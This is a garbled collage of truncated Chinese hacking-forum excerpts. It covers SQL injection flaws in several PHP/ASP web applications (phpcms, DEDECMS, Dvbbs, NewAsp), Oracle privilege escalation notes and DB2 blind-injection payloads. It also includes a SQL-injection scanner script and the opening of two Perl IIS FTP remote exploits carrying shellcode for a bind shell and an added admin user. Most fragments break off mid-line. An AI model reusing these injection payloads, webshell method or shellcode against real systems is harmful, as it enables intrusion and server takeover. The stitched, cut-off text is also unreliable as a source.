作者:博士
漏洞文件download.php

       <?php
require dirname(__FILE__).'/include/common.inc.php';

$a_k = phpcms_auth($a_k, 'DECODE', AUTH_KEY);                                 //注意!!
if(empty($a_k)) showmessage($LANG['illegal_parameters']);
parse_str($a_k);

作者:st0p&Rainy'Fox
同样是在magic_quotes_gpc=off的情况下可用

漏洞版本:DEDECMS 5.1
此漏洞可拿到后台管理员的帐号和加密HASH,漏洞存在文件plus/feedback_js.php,未过滤参数为$arcurl

author: cnryan @http://hi.baidu.com/cnryan

   网趣网上购物系统是一套简单易用、功能强大、用户使用最为广泛的网上购物开店平台,凭借多年的网上购物系统研发经验,软件功能日趋强大与完善、依托庞大的用户使用群体,网趣网上购物系统越来越受到用户的青睐,成为众多用户网上开店首选品牌。

这是官方的话 ↑
这个sql injection出现在找回密码处，最新版本的9.4也存在漏洞，随后对v9.0等以下版本测试均存在漏洞。

漏洞页面：getpwd2.asp

漏洞代码：
<%
u

受影响系统：
动网论坛 Dvbbs php 2.0
描述：
--------------------------------------------------------------------------------
BUGTRAQ   ID: 36282
DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序。
DvBBS没有正确地过滤用户提交给boardrule.php模块的groupboardid参数，远程攻击者可以通过向论坛提交恶意参数请求执行SQL注入攻击。
<*来源：Securitylab.ir
  
   链接：

作者：浅凝

很多时候对于开放1521端口的Windows下Oracle数据库服务器，因为大多存在默认低权限用户dbsnmp，或者人品爆发高权限的用户 (sysdba)是默认密码或弱口令，由此可以通过Oracle的一些提权漏洞获取Oracle的最高权限，直至得到系统的SYSTEM权限。

而 对于Linux下的Oracle数据库入侵，因为Linux下一般Oracle数据库都是以Oracle的独立用户在跑，所以无法获取到root权限。当 然很多WEB和数据库在同一服务器上的时候，可以导出WEBSHELL到WEB目录来获取权限。然而大部分的数据库都是独立跑在一个服务器上，以下用

转自:[朱总司令]

DB2数据库ASCII半折法注射方法

UNION方式暂没空研究，有空再折腾，项目里遇到DB2的数据库，网上没完整的资料，顺手整了这一份，第一条和第二条已在实际注射环境测试，其余各条在查询分析器中测试OK。

做人要厚道，转载请注明出处

猜用户表数量：
and 0<(SELECT count(NAME) FROM SYSIBM.SYSTABLES where CREATOR=USER)

猜表长度：
and 3<(SELECT LENGTH(NAME) FROM SYSIBM.SYSTABLES where name not in(’COLUMNS’) fetch first 1 rows only)

首发：红科网安
作者：Amxking

概述：
           由于新云4.0对注册用户未过滤特殊字符，造成黑客通过脚本编码转换将一句话木马写入数据库文件，从而获得WEBSHELL权限。


测试：

    1. 打开www.google.cn    搜索关键字:Powered By NewAsp CMS Version 4.0 或 新云问吧
   
    2. 将<%execute reques

作者：LCX

set arg=wscript.arguments
If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then
Wscript.Quit
End If
if arg.count=0 then
usage()
Wscript.Quit
End If

Sub usage()
wsh.echo string(79,"*")
wsh.echo "暂且只支持mssql显错模式，直接写url为数字型，写url'为字符型"
wsh.echo "sqlids v0.02 by lcx"
wsh.echo "Usage:"
wsh.echo "cscript "&wscript.scriptname&

出自：http://t00ls.net

<?php

echo"   +----------------------------------------------------------------+\r\n";

echo"                   [url]http://www.t00ls.net[/url]\r\n";

echo"   +----------------------------------------------------------------+\r\n";

for ($ii=1;$ii<=99;$ii++)

{

$c=(int)$ii*10+1;

$a="web.search.naver.com";

$b="/search.nav

出自：http://t00ls.net

<?php

for ($ii=0;$ii<=300;$ii++)

{

$c=(int)$ii*10+1;

print $c."          \r\n";

echo"   +----------------------------------------------------------------+\r\n";

echo"                  [url]http://www.t00ls.net[/url]     \r\n";

echo"   +----------------------------------------------------------------+\r\n";

$a="web.se

#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit 
# Win2k SP4 targets 
# bug found & exploited by Kingcope, kcope2<at>googlemail.com 
# Affects IIS6 with stack cookie protection 
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444

# http://www.offensive-security.com/0day/msftp.pl.txt

use IO::Socket; 
$|=1; 
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x

# IIS 5.0 FTPd / Remote r00t exploit 
# Win2k SP4 targets 
# bug found & exploited by Kingcope, kcope2<at>googlemail.com 
# Affects IIS6 with stack cookie protection 
# August 2009 - KEEP THIS 0DAY PRIV8 
use IO::Socket; 
$|=1; 
#metasploit shellcode, adduser "winown:nwoniw" 
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" . 
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" . 
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x